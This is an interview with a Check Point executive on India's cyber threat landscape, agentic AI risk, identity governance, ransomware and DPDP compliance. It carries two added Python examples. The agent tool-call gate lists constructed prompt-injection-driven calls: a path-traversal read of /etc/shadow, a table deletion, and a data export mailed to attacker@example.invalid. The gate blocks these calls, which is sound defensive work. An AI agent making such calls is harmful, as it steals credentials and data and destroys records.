Machine Speed, Human Stakes: Why India’s Cyber Defenses Are Running Out of Time

India is now one of the most targeted nations in the cyber world, not by coincidence, but by design. With organizations absorbing nearly 3,300 attacks per week, significantly above the global average, the country’s rapid digital expansion has outpaced the security architectures meant to protect it. Sundar Balasubramanian, Managing Director for India and South Asia at Check Point Software Technologies, has watched this threat landscape intensify in real time. A seasoned voice on enterprise security strategy, Balasubramanian brings a perspective that is at once granular and urgent, ranging from the structural blind spots hiding inside fragmented cloud architectures to the boardroom conversations that still treat cyber risk as an IT line item rather than a business imperative. In this wide-ranging conversation with CISO Forum, he makes one thing unambiguously clear: the old playbooks no longer work, and the clock is ticking.

Sundar Balasubramanian
Managing Director for India and South Asia
Check Point Software Technologies

CISO Forum: AI Threat Intelligence: With India at 3,195 weekly attacks and AI accelerating adversarial speed, where are Indian enterprises most structurally unprepared and where are the most dangerous blind spots?

Sundar Balasubramanian: India’s cyber threat environment is now operating at significantly higher intensity than global averages, with organizations facing nearly 3,300 cyberattacks per week compared to the global average of 2,064 attacks per organization, according to a recent Check Point Threat Intelligence Report. This reflects not just higher attack frequency, but the rapid expansion of enterprise attack surfaces across cloud, SaaS, APIs, AI workloads, hybrid infrastructure, and third-party ecosystems.

What is increasingly evident is that attackers are no longer focused only on perimeter exploitation. They are targeting visibility gaps created by fragmented security architectures. Many organizations still operate with siloed controls across cloud, endpoint, identity, and network environments, making real-time threat correlation difficult and slowing the effectiveness of prevention.

The biggest structural blind spots today include unmanaged machine identities, shadow AI deployments, insecure APIs, lateral movement across hybrid environments, and weak governance around third-party access. Machine identities are scaling exponentially faster than human identities, yet most enterprises still lack centralized lifecycle management and behavioral monitoring around them.

AI is also fundamentally compressing attacker timelines. Check Point’s latest findings show that 90% of global organizations encountered risky AI prompts, 40% of MCP servers were vulnerable, and high-risk prompts increased by 97% year-on-year in 2025. This means enterprises are now facing AI-enabled reconnaissance, AI-generated phishing, automated malware adaptation, and AI-assisted impersonation campaigns at scale.

India’s exposure levels remain particularly elevated across multiple malware categories, including infostealer attacks at 7.5% versus 4.6% globally, banking malware at 4.3% versus 1.7%, botnet activity at 17.3% versus 9.9%, and ransomware impact at 7% compared to 3.6% globally. Additionally, 92% of malicious files delivered in India last month came through web-based channels, highlighting how browser-driven attack vectors are dominating modern threat delivery.

From a governance perspective, frameworks such as the DPDP Act and CERT-In mandates are also pushing enterprises to rethink cybersecurity beyond perimeter defense. Security now needs to operate as a continuous operational resilience layer embedded across infrastructure, identity, AI governance, and data flows.

CISO Forum: Agentic AI Risk: As agentic AI represents the next frontier of enterprise risk, how should CISOs think about its unique risk profile and what does a staged security architecture look like across maturity levels?

Sundar Balasubramanian: Agentic AI introduces a fundamentally different cyber risk model because these systems are designed not just to analyze information, but to autonomously make decisions, execute workflows, interact with APIs, and access enterprise systems with minimal human intervention. This shifts the security challenge from application protection toward runtime governance and execution-layer control.

The primary concern today is that enterprises are operationalizing AI agents faster than they are redesigning their governance architectures to support them. Check Point Research has already highlighted growing exposure to vulnerable MCP servers, risky prompts, and AI-assisted attack automation. Threat actors are increasingly using AI to accelerate phishing, malware customization, reconnaissance, and impersonation campaigns.

The risk profile around agentic AI includes prompt injection, privilege escalation, plugin compromise, data poisoning, runtime manipulation, excessive permissions, and AI-assisted lateral movement. What makes this especially challenging is that compromise can now occur through execution logic rather than only infrastructure exploitation.

CISOs, therefore, need to approach AI security in a phased maturity model. The first stage is governance and visibility — understanding where AI agents operate, what systems they access, and how sensitive data flows through them. The second stage is runtime protection through Zero Trust enforcement, API governance, segmentation, behavioral analytics, and continuous authentication. The final stage is autonomous resilience, in which organizations implement AI-driven policy orchestration, automated containment, and continuous runtime trust validation.

In India, this becomes even more important under DPDP obligations and emerging governance expectations across BFSI, telecom, healthcare, and critical infrastructure sectors. AI governance is increasingly linked to accountability, explainability, data localization, and operational compliance.

The long-term challenge is therefore not simply protecting AI systems, but governing autonomous decision-making inside enterprise environments. Organizations that continue treating AI security as an isolated application security problem will struggle to manage operational risk at scale.
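The "runtime protection" stage described above comes down to an execution-layer policy gate that sits between the agent and its tools. The following is an added example and is not code from the interview or from Check Point; it assumes a hypothetical agent runtime that emits each tool call as a dict of the form `{"tool": name, "args": {...}}`, and the policy, tool names and call sequence are constructed for illustration. It shows the three checks that matter most for the risks listed (prompt injection steering the agent to a non-allowlisted tool, a path-traversal attempt against a scoped file tool, and a destructive action attempted without human sign-off) plus a call budget against runaway loops.

```python
"""Execution-layer policy gate for an AI agent's tool calls.

Added example, not code from the interview or from Check Point. It assumes a
hypothetical agent runtime that emits each tool call as {"tool": name, "args": {...}}
and that every agent runs under a named identity with an explicit allowlist.
All policies, tool names and calls below are constructed for illustration.
"""
import posixpath
from dataclasses import dataclass, field


class PolicyViolation(Exception):
    """Raised when a tool call falls outside the agent's policy."""


@dataclass(frozen=True)
class AgentPolicy:
    agent_id: str
    allowed_tools: frozenset          # tools this agent may invoke at all
    allowed_paths: tuple              # filesystem prefixes it may touch
    destructive_tools: frozenset = field(default_factory=frozenset)  # need human sign-off
    max_calls_per_run: int = 20       # budget against runaway loops


def _path_permitted(path, prefixes):
    # Normalise first so "/data/tickets/../../etc/shadow" cannot slip past a prefix match.
    norm = posixpath.normpath(path)
    return any(norm == p or norm.startswith(p.rstrip("/") + "/") for p in prefixes)


def check_tool_call(policy, call, approved_by_human=False, calls_so_far=0):
    """Return True if the call is permitted; raise PolicyViolation otherwise."""
    tool = call.get("tool")
    args = call.get("args", {})
    if calls_so_far >= policy.max_calls_per_run:
        raise PolicyViolation("call budget exhausted")
    if tool not in policy.allowed_tools:
        raise PolicyViolation(f"tool {tool!r} not allowlisted for {policy.agent_id}")
    path = args.get("path")
    if path is not None and not _path_permitted(path, policy.allowed_paths):
        raise PolicyViolation(f"path {path!r} outside allowed prefixes")
    if tool in policy.destructive_tools and not approved_by_human:
        raise PolicyViolation(f"destructive tool {tool!r} requires human approval")
    return True


def run_agent(policy, calls, approved_indices=()):
    """Feed a sequence of tool calls through the gate; return (decision, tool, reason) tuples."""
    decisions, permitted = [], 0
    for i, call in enumerate(calls):
        try:
            check_tool_call(policy, call, i in approved_indices, permitted)
            permitted += 1
            decisions.append(("allow", call.get("tool"), ""))
        except PolicyViolation as exc:
            decisions.append(("deny", call.get("tool"), str(exc)))
    return decisions


# Constructed policy for a hypothetical ticket-triage agent.
TRIAGE_POLICY = AgentPolicy(
    agent_id="triage-agent",
    allowed_tools=frozenset({"read_file", "search_tickets", "send_email"}),
    allowed_paths=("/data/tickets",),
    destructive_tools=frozenset({"send_email"}),
    max_calls_per_run=5,
)

# Constructed call sequence. Calls 2 to 4 are what a prompt injection planted in a
# ticket body might push the agent to attempt; call 5 is the legitimate outbound mail.
CONSTRUCTED_CALLS = [
    {"tool": "read_file", "args": {"path": "/data/tickets/1042.txt"}},
    {"tool": "search_tickets", "args": {"query": "refund"}},
    {"tool": "read_file", "args": {"path": "/data/tickets/../../etc/shadow"}},
    {"tool": "delete_records", "args": {"table": "customers"}},
    {"tool": "send_email", "args": {"to": "attacker@example.invalid", "body": "ticket export"}},
    {"tool": "send_email", "args": {"to": "support@example.invalid", "body": "triage summary"}},
]

if __name__ == "__main__":
    # Index 5 is the one outbound mail a human has approved.
    for decision in run_agent(TRIAGE_POLICY, CONSTRUCTED_CALLS, approved_indices={5}):
        print(decision)
```

The gate is deliberately ignorant of the prompt: it does not try to detect the injection, it only refuses actions the agent's identity was never entitled to take, which is what makes the control hold even when the model is fully steered.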

CISO Forum: Prevention vs. Resilience: With 44% of Indian CISOs prioritizing cyber resilience over prevention, how do you reconcile these two imperatives — and where does the Infinity Platform fit a resilience-first strategy?

Sundar Balasubramanian: The debate between prevention and resilience is increasingly becoming obsolete because modern cyber environments no longer allow organizations to prioritize one at the expense of the other. Prevention without resilience assumes compromise is impossible, while resilience without prevention creates operational fatigue, escalating recovery costs, and prolonged disruption.

This balance has become especially critical in India’s high-intensity threat landscape. Check Point Research observed a 53% year-on-year increase in ransomware victim volumes globally, alongside nearly 50% growth in new ransomware groups, according to Check Point Research’s latest Ransomware Report. Attackers are also embedding AI into phishing, reconnaissance, malware customization, and extortion workflows.

India is already experiencing disproportionately high exposure, with ransomware impacting 7% of organizations compared to 3.6% globally. In comparison, botnet exposure in India stands at 17.3%, nearly double the global average according to Check Point Threat Intelligence Report. Modern attacks now move at machine speed, establish persistence early, and often exfiltrate sensitive data long before disruption becomes visible.

This is why recovery-centric models alone are no longer sustainable. Enterprises need architectures capable of reducing the probability of compromise, limiting lateral movement, and minimizing the operational blast radius before disruption occurs.

Platforms like Check Point Infinity are designed around this convergence between prevention and resilience. Check Point Infinity unifies cloud, endpoint, network, mobile, email, and identity protection into a single operational architecture powered by ThreatCloud AI. Rather than operating as isolated security layers, prevention, detection, response, and policy orchestration function continuously across environments.

The practical advantage is operational coherence, enabling organizations to reduce attack surface, accelerate detection, strengthen response coordination, and sustain business continuity simultaneously. In today’s environment, resilience should not be measured only by recovery speed, but by how effectively organizations can sustain operations under active attack conditions.

CISO Forum: Identity as the New Perimeter: Machine identities and third-party credentials sit at the lowest maturity tiers. What are the most common identity governance failures in Indian enterprises — and what is the realistic path to closing this gap?

Sundar Balasubramanian: Identity has effectively become the new enterprise perimeter as organizations continue expanding across hybrid work environments, SaaS ecosystems, cloud infrastructure, APIs, and third-party integrations. Attackers today are increasingly bypassing traditional perimeter controls and targeting credentials, service accounts, machine identities, API tokens, and vendor access pathways because these often operate with excessive trust and limited visibility.

Check Point’s India threat findings already reflect elevated identity-driven attacks. Banking malware impact in India stands at 4.3% compared to 1.7% globally, while infostealer attacks are at 7.5% versus 4.6% globally. These attacks are specifically designed to harvest credentials, escalate privileges, and establish persistent access inside enterprise environments.

The larger governance issue is that machine identities are now growing significantly faster than human identities, while security maturity around non-human identity governance remains low. Most organizations still lack centralized lifecycle management, behavioral monitoring, and policy enforcement for service accounts, APIs, workloads, and automated systems.

The most common failures we continue to see include excessive privileged access, inconsistent MFA enforcement, weak governance around vendor credentials, shared administrative access, poor API token hygiene, and limited visibility into machine identity behavior. In many environments, identity governance still operates independently of cloud, endpoint, and network security, resulting in fragmented enforcement models.

The realistic path forward is identity-centric Zero Trust architecture built around continuous authentication, adaptive trust, least-privilege access, and unified visibility across users, workloads, devices, APIs, and third-party systems. AI-driven behavioral analytics will also become increasingly important as machine-to-machine communication continues to scale rapidly.

From an India compliance standpoint, DPDP obligations and sectoral governance expectations across BFSI, telecom, healthcare, and critical infrastructure are further accelerating the need for stronger identity governance. Identity security is no longer a standalone IAM conversation; it now sits at the center of enterprise cyber resilience.
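The governance failures listed above (stale service accounts, unrotated API tokens, wildcard privileges, ownerless and shared administrative identities) are all checkable once a central inventory exists. The following is an added example, not code from the interview or from any vendor product; it assumes a hypothetical inventory export with one record per non-human identity and the fields shown, and the records, thresholds and finding names are constructed for illustration. It runs the checks over that inventory and ranks which gap is most widespread.

```python
"""Machine-identity hygiene audit over a constructed inventory.

Added example, not from the interview or from any vendor product. It assumes a
hypothetical inventory export (one dict per non-human identity) with the fields
used below; the records, thresholds and finding names are made up for illustration.
"""
from datetime import date

# Constructed inventory: service accounts, API tokens and a shared admin identity.
CONSTRUCTED_INVENTORY = [
    {"id": "svc-billing-etl", "kind": "service_account", "owner": "data-eng",
     "created": "2025-01-10", "last_used": "2026-02-27",
     "privileges": ["db:read", "db:write"], "shared": False},
    {"id": "tok-ci-deploy", "kind": "api_token", "owner": "platform",
     "created": "2025-06-01", "last_used": "2026-02-28",
     "privileges": ["deploy:*"], "shared": False},
    {"id": "svc-legacy-report", "kind": "service_account", "owner": "",
     "created": "2023-03-15", "last_used": "2025-09-01",
     "privileges": ["db:read"], "shared": False},
    {"id": "tok-vendor-support", "kind": "api_token", "owner": "vendor-acme",
     "created": "2026-01-15", "last_used": None,
     "privileges": ["*"], "shared": False},
    {"id": "adm-shared-ops", "kind": "service_account", "owner": "ops",
     "created": "2024-01-01", "last_used": "2026-03-01",
     "privileges": ["admin"], "shared": True},
]


def _is_broad(priv):
    """Wildcard or blanket admin grants are the 'excessive privilege' pattern."""
    return priv == "*" or priv == "admin" or priv.endswith(":*")


def audit(inventory, today="2026-03-01", stale_days=90, rotation_days=180):
    """Return {identity_id: sorted finding codes} for identities with at least one finding."""
    today = date.fromisoformat(today)
    report = {}
    for ident in inventory:
        findings = set()
        created = date.fromisoformat(ident["created"])
        last_used = ident.get("last_used")
        last_used = date.fromisoformat(last_used) if last_used else None

        if not ident.get("owner"):
            findings.add("no_owner")           # nobody to answer for it or revoke it
        if last_used is None or (today - last_used).days > stale_days:
            findings.add("stale")              # unused credentials are pure attack surface
        if ident["kind"] == "api_token" and (today - created).days > rotation_days:
            findings.add("unrotated_token")    # long-lived secrets outlive their blast-radius assumptions
        broad = any(_is_broad(p) for p in ident.get("privileges", []))
        if broad:
            findings.add("wildcard_privilege")
        if broad and ident.get("shared"):
            findings.add("shared_admin")       # no per-person accountability for admin actions
        if findings:
            report[ident["id"]] = sorted(findings)
    return report


def summarize(report):
    """Count identities per finding code so the most widespread gap rises to the top."""
    counts = {}
    for codes in report.values():
        for code in codes:
            counts[code] = counts.get(code, 0) + 1
    return dict(sorted(counts.items(), key=lambda kv: (-kv[1], kv[0])))


if __name__ == "__main__":
    result = audit(CONSTRUCTED_INVENTORY)
    for ident_id, codes in result.items():
        print(ident_id, codes)
    print(summarize(result))
```

The thresholds are policy inputs, not constants of nature: a 90-day idle window and a 180-day token lifetime are common starting points, and the same audit should be re-run on every inventory refresh rather than once a year.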

CISO Forum: Ransomware Kill Chain: With ransomware rated the most severe threat by 79% of respondents, how should Indian organizations redesign their architecture to disrupt the attack chain before encryption and exfiltration occur?

Sundar Balasubramanian: Ransomware has evolved far beyond isolated encryption attacks and now operates as a multi-stage business disruption model involving credential theft, reconnaissance, lateral movement, privilege escalation, exfiltration, and extortion. The challenge is that many organizations still intervene too late in the attack lifecycle, often only after encryption begins or operational disruption becomes visible.

Check Point Research observed a 53% year-on-year increase in ransomware victim volumes globally, alongside nearly 50% growth in new ransomware groups, according to the latest Ransomware Report. Smaller and more agile ransomware operators are increasingly embedding AI into phishing campaigns, malware customization, reconnaissance, and negotiation workflows.

India is already experiencing disproportionately high ransomware exposure, with 7% of organizations impacted compared to 3.6% globally, according to the Check Point Threat Intelligence Report. This reflects not only elevated attack activity but also structural visibility gaps across hybrid enterprise environments. Modern ransomware campaigns increasingly target cloud environments, unmanaged endpoints, APIs, and third-party ecosystems where monitoring remains fragmented.

The architectural shift organizations need today is moving from recovery-centric security models toward attack-chain interruption. The objective should be to stop attackers during the initial compromise, privilege escalation, and lateral movement phases before encryption and exfiltration occur.

Key priorities, therefore, include AI-powered phishing prevention, east-west traffic inspection, identity segmentation, least-privilege enforcement, continuous endpoint telemetry, behavioral analytics, immutable backup isolation, real-time threat intelligence correlation, and AI-assisted detection with automated containment.

A unified security architecture becomes critical in this environment because isolated controls cannot quickly correlate attack behavior in AI-driven attack scenarios. Prevention today is increasingly dependent on cross-domain visibility and coordinated policy enforcement rather than standalone point products.

CISO Forum: AI-Powered SOC and Talent Crisis: With talent shortage now the top internal barrier, what organizational prerequisites must be in place before SOC automation delivers — and what mistakes are organizations making in their automation journeys?

Sundar Balasubramanian: The cybersecurity talent shortage is becoming one of the biggest operational risks for enterprises because threat environments are expanding faster than security team capacity. Indian organizations are already facing nearly 3,300 attacks per week per organization, according to the Check Point Threat Intelligence Report, significantly above global averages, creating growing analyst fatigue, alert overload, and operational inefficiencies across SOC environments.

One of the biggest mistakes organizations continue to make is assuming automation alone will solve the talent problem. In reality, SOC automation only delivers value when foundational operational maturity already exists. Automating fragmented environments with inconsistent telemetry often accelerates noise rather than improving security outcomes.

Before deploying AI-powered SOC operations, enterprises need several foundational capabilities in place: unified telemetry visibility across cloud, endpoint, identity, network, and email environments; standardized response workflows; integrated policy orchestration; risk-based alert prioritization; high-quality threat intelligence; and cross-domain correlation capabilities.

Check Point’s research shows how AI is accelerating attack sophistication through AI-assisted phishing, malware adaptation, reconnaissance, and impersonation campaigns. This means SOC teams are now expected to defend against threats operating at machine speed, making operational simplification increasingly important.

The role of AI inside the SOC should therefore be augmentation rather than replacement. AI is most effective when it reduces repetitive workloads, accelerates correlation, improves prioritization, and allows analysts to focus on higher-order decision-making and incident response. Organizations achieving the strongest outcomes are those that combine AI automation with platform consolidation, operational simplification, and unified visibility.

In India, sectors such as BFSI, telecom, government, and critical infrastructure are also facing increased compliance expectations under the DPDP and CERT-In frameworks, making faster incident response, greater auditability, and enhanced operational visibility even more critical.

CISO Forum: DPDP Act: Architecture, Not Documentation — Most organizations still treat DPDP compliance as a reporting exercise. What specific architectural changes must CISOs implement to be operationally compliant — not just documentationally ready?

Sundar Balasubramanian: A significant number of enterprises still approach DPDP readiness primarily as a legal and reporting exercise, but operational compliance requires far deeper architectural transformation across data visibility, access governance, runtime monitoring, and breach response. Policies and documentation alone do not reduce operational exposure if sensitive data remains fragmented, overexposed, or poorly governed across hybrid environments.

Check Point’s India findings from the Check Point Threat Intelligence Report show that Information Disclosure has become the most common exploit category, impacting nearly 74% of organizations. This reinforces the idea that data exposure risk is increasingly operational rather than theoretical.

To become operationally compliant under DPDP, enterprises need to redesign their security architecture to enable continuous visibility, enforcement, and accountability. Key priorities include continuous data discovery and classification, identity-centric access governance, encryption and tokenization of sensitive data, API security enforcement, cloud workload visibility, runtime monitoring, real-time breach detection, and centralized auditability.

The challenge is compounded because Indian enterprises now operate across highly distributed environments that include SaaS applications, AI systems, cloud infrastructure, remote work models, and interconnected third-party ecosystems. Traditional perimeter-led governance is no longer sufficient in these environments.

Operational compliance will increasingly depend on whether organizations can demonstrate technical enforcement capability rather than only policy intent. Under DPDP and CERT-In mandates, enterprises will need to prove they can detect, contain, audit, and respond to incidents in near real time.

The organizations that will mature fastest are those that embed compliance directly into operational workflows through automation, unified telemetry, AI-driven monitoring, and continuous policy enforcement, rather than treating compliance as a periodic reporting exercise.

CISO Forum: Supply Chain Risk at Scale: Third-party risk monitoring beyond tier-one vendors is at the lowest maturity level. What does credible supply chain governance look like at a conglomerate scale — and what do boards systematically underestimate?

Sundar Balasubramanian: Supply chain attacks are becoming increasingly sophisticated because attackers are now exploiting trusted digital relationships rather than directly targeting enterprise perimeters. Modern enterprise ecosystems include SaaS providers, outsourced development teams, APIs, AI models, cloud platforms, open-source dependencies, and interconnected partner networks operating at enormous scale.

Check Point Research recently demonstrated an AI-assisted supply chain attack in which malicious code was introduced into an autonomous crypto-trading project via AI-generated contributions. This highlights how AI is now accelerating ecosystem-wide compromise pathways while lowering the barrier for attackers to infiltrate trusted software pipelines.

The biggest governance gap is that most enterprises still focus primarily on tier-one vendor assessment, while transitive exposure across fourth-party and fifth-party ecosystems remains largely unmonitored. Boards frequently underestimate how interconnected modern digital ecosystems have become and how quickly compromise can propagate across trusted environments.

The lowest maturity areas continue to include continuous third-party monitoring, vendor identity governance, software dependency visibility, API exposure management, runtime validation, privilege auditing, and behavioral monitoring across partner ecosystems.

Credible supply chain governance, therefore, requires moving from enterprise-centric security models toward ecosystem-centric governance. Organizations need continuous validation frameworks, software bill-of-materials visibility, Zero Trust enforcement, identity-centric controls, and AI-driven threat monitoring across interconnected vendor environments.

India’s push toward digital sovereignty, combined with DPDP obligations and sector-specific governance requirements, is also increasing pressure on organizations to strengthen oversight across outsourced operations, software dependencies, and data-sharing ecosystems. Supply chain security is no longer purely a procurement issue; it has become a core operational resilience challenge.

CISO Forum: Consolidation vs. Coverage Gaps: With deeply embedded point solutions and high sunk costs, how do you advise CISOs to build a pragmatic consolidation roadmap without creating new coverage gaps during transition?

Sundar Balasubramanian: Operational complexity has itself become a major multiplier of cyber risk. Indian organizations are already facing nearly 60% more attacks than the global average while simultaneously managing fragmented environments across cloud, endpoint, network, identity, SaaS, APIs, and AI layers.

Many enterprises now recognize the strategic need for consolidation, but one of the biggest mistakes organizations make is pursuing aggressive vendor reduction before establishing operational visibility and governance maturity. Abrupt platform rationalization can create dangerous blind spots if controls are removed faster than security capabilities evolve.

A pragmatic consolidation strategy should therefore begin with telemetry unification rather than immediate tool elimination. Organizations first need centralized visibility, policy orchestration, and cross-domain correlation before rationalizing overlapping technologies.

Key priorities should include telemetry unification across cloud, endpoint, identity, and network environments; centralized policy orchestration; cross-domain visibility; continuous validation testing; risk-prioritized migration; and platform-led operational simplification. Incremental consolidation is generally far more sustainable than large-scale replacement exercises.

The strategic objective is not only to reduce vendor count but to improve consistency in prevention, accelerate response times, reduce alert fatigue, and strengthen operational coherence across hybrid environments.

Platforms like Check Point Infinity are becoming increasingly relevant because they allow organizations to consolidate prevention, visibility, and operational management capabilities without sacrificing coverage during transition periods. A unified architecture becomes especially important in AI-driven threat environments, where fragmented tooling impedes correlation and delays responses.

From a business perspective, consolidation also needs to align with operational resilience, compliance readiness, and long-term governance strategy rather than purely procurement-driven cost optimization.

CISO Forum: The Board Conversation: With leadership misalignment the biggest barrier to stronger security outcomes, what is your practical playbook for shifting the board conversation from budget approval to genuine co-ownership of cyber risk?

Sundar Balasubramanian: Cybersecurity conversations at the board level are increasingly shifting from technical oversight to enterprise resilience, operational continuity, and governance accountability. This shift is necessary because Indian organizations operate in one of the world’s highest-threat-density environments.

According to recent data from the Check Point Threat Intelligence Report, sectors such as education, government, telecom, and infrastructure are experiencing some of the highest attack volumes in India, with the education sector alone facing more than 7,100 attacks per organization per week. This demonstrates that cyber risk is no longer confined to IT environments; it now directly impacts operational continuity, customer trust, regulatory exposure, and business resilience.

One of the biggest barriers to stronger cybersecurity outcomes remains leadership misalignment. Many organizations still approach cybersecurity as an annual budget discussion rather than an enterprise-wide governance issue. As a result, accountability often remains isolated within security teams rather than being embedded in strategic business decision-making.

The most effective CISOs are reframing cyber conversations around financial exposure, operational disruption, AI governance, supply chain resilience, regulatory accountability, reputational impact, and customer trust. Boards respond far more effectively when cybersecurity is connected to measurable business outcomes rather than isolated technical metrics.

The practical playbook for stronger board engagement is translating cyber posture into business-impact language. Discussions around ransomware, AI risk, third-party exposure, and operational resilience need to be positioned in terms of revenue impact, downtime, ecosystem disruption, regulatory penalties, and strategic continuity.

Cybersecurity governance increasingly needs to resemble financial governance — embedded in transformation initiatives, cloud strategy, AI adoption, M&A decisions, and supply chain oversight. The organizations making the strongest progress today are those where cyber accountability extends beyond the CISO and becomes a shared leadership responsibility across business, operations, compliance, and technology teams.
